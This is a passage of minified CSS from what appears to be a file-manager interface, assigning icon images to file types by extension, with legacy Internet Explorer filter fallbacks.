\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-cs,.x-asp,.x-aspx{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-java,.x-jsp{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-mm,.x-cc,.x-cxx,.x-cpp,.x-c,.x-m,.x-nc{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-h,.x-hpp,.x-hh,.x-pch{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-png,.x-jpg,.x-jpeg,.x-bmp,.x-gif,.x-picture,.x-ico,.x-svg,.x-cur,.x-webp,.x-tif,.x-tiff{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-make,.x-Makefile,.x-makefile,.x-GNUmakefile,.x-OCamlMakefile,.x-makemakefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-iso,.x-vcd{background-image:url("../../../images/file_icon/icon_file/iso.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');}.x-pkg,.x-package,.x-framework{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-7z,.x-apk,.x-ace,.x-arj,.x-bza,.x-cab,.x-cxr,.x-dgc,.x-gca,.x-gz,.x-gza,.x-iso,.x-jar,.x-lzh,.x-rar,.x-rk,.x-tar,.x-tbz,.x-tgz,.x-tlz,.x-txz,.x-yz1,.x-zip{background-image:url("../../../images/file_icon/icon_file/zip_all.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');}.x-exe,.x-bin,.x-class,.x-a,.x-so{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-ttf,.x-otf,.x-eot,.x-woff,.x-tiff,.x-ttc{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-bat,.x-cmd,.x-sh,.x-bash,.x-bashrc{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-ini,.x-inf,.x-conf,.x-meta,.x-gitignore,.x-plist,.x-htaccess,.x-localized,.x-xcscheme,.x-storyboard,.x-xib,.x-strings,.x-pbxproj{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-md,.x-markdown{background-image:url("../../../images/file_icon/icon_file/md.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-accdb{background-image:url("../../../images/file_icon/icon_file/accdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');}.x-7z{background-image:url("../../../images/file_icon/icon_file/7z.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');}.x-ai{background-image:url("../../../images/file_icon/icon_file/ai.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');}.x-air{background-image:url("../../../images/file_icon/icon_file/air.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');}.x-arj{background-image:url("../../../images/file_icon/icon_file/arj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');}.x-apk{background-image:url("../../../images/file_icon/icon_file/apk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');}.x-as{background-image:url("../../../images/file_icon/icon_file/as.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');}.x-ascx{background-image:url("../../../images/file_icon/icon_file/ascx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');}.x-ashx{background-image:url("../../../images/file_icon/icon_file/ashx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');}.x-asmx{background-image:url("../../../images/file_icon/icon_file/asmx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');}.x-aspx{background-image:url("../../../images/file_icon/icon_file/aspx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');}.x-bz2{background-image:url("../../../images/file_icon/icon_file/bz2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');}.x-cdr{background-image:url("../../../images/file_icon/icon_file/cdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');}.x-cer{background-image:url("../../../images/file_icon/icon_file/cer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');}.x-chm{background-image:url("../../../images/file_icon/icon_file/chm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');}.x-cmd{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-c{background-image:url("../../../images/file_icon/icon_file/c.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');}.x-cpp{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-cs{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-cshtml{background-image:url("../../../images/file_icon/icon_file/cshtml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');}.x-csproj{background-image:url("../../../images/file_icon/icon_file/csproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');}.x-css{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-csv{background-image:url("../../../images/file_icon/icon_file/csv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');}.x-djvu{background-image:url("../../../images/file_icon/icon_file/djvu.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');}.x-dll{background-image:url("../../../images/file_icon/icon_file/dll.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');}.x-dng{background-image:url("../../../images/file_icon/icon_file/dng.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');}.x-dmg,.x-img{background-image:url("../../../images/file_icon/icon_file/dmg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');}.x-doc,.x-wps{background-image:url("../../../images/file_icon/icon_file/doc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');}.x-docm{background-image:url("../../../images/file_icon/icon_file/docm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');}.x-docx{background-image:url("../../../images/file_icon/icon_file/docx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');}.x-dot{background-image:url("../../../images/file_icon/icon_file/dot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');}.x-dotm{background-image:url("../../../images/file_icon/icon_file/dotm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');}.x-dotx{background-image:url("../../../images/file_icon/icon_file/dotx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');}.x-dtd{background-image:url("../../../images/file_icon/icon_file/dtd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');}.x-eps{background-image:url("../../../images/file_icon/icon_file/eps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');}.x-epub{background-image:url("../../../images/file_icon/icon_file/epub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');}.x-exe{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-f{background-image:url("../../../images/file_icon/icon_file/f.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-fla{background-image:url("../../../images/file_icon/icon_file/fla.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');}.x-font{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-gif{background-image:url("../../../images/file_icon/icon_file/gif.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');}.x-gz{background-image:url("../../../images/file_icon/icon_file/gz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');}.x-h{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-hdr{background-image:url("../../../images/file_icon/icon_file/hdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');}.x-hlp{background-image:url("../../../images/file_icon/icon_file/hlp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');}.x-html{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-indd{background-image:url("../../../images/file_icon/icon_file/indd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');}.x-ini{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-ipa{background-image:url("../../../images/file_icon/icon_file/ipa.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');}.x-jar{background-image:url("../../../images/file_icon/icon_file/jar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');}.x-java{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-jpg{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-js{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-json{background-image:url("../../../images/file_icon/icon_file/json.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');}.x-key{background-image:url("../../../images/file_icon/icon_file/key.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');}.x-ldf{background-image:url("../../../images/file_icon/icon_file/ldf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');}.x-lnk{background-image:url("../../../images/file_icon/icon_file/lnk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');}.x-makefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-mdb{background-image:url("../../../images/file_icon/icon_file/mdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');}.x-mdf{background-image:url("../../../images/file_icon/icon_file/mdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');}.x-mht{background-image:url("../../../images/file_icon/icon_file/mht.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');}.x-midi{background-image:url("../../../images/file_icon/icon_file/midi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');}.x-mpp{background-image:url("../../../images/file_icon/icon_file/mpp.png");background-image:none 